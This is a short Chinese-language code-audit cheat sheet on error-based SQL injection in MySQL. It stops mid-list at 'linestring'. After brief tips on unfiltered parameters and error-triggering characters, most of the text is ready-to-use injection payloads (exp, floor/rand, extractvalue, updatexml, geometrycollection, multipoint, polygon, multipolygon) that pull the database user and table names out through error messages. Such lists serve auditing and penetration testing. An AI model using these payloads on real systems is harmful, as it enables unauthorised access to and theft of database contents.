目录
审计思路
-
代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。
-
常用报错检测符号:’ \ ; %00 ) ( # "
-
报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。
-
特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_concat等函数聚合数据即可。
报错语句
id=4 and exp(~(select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a));
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring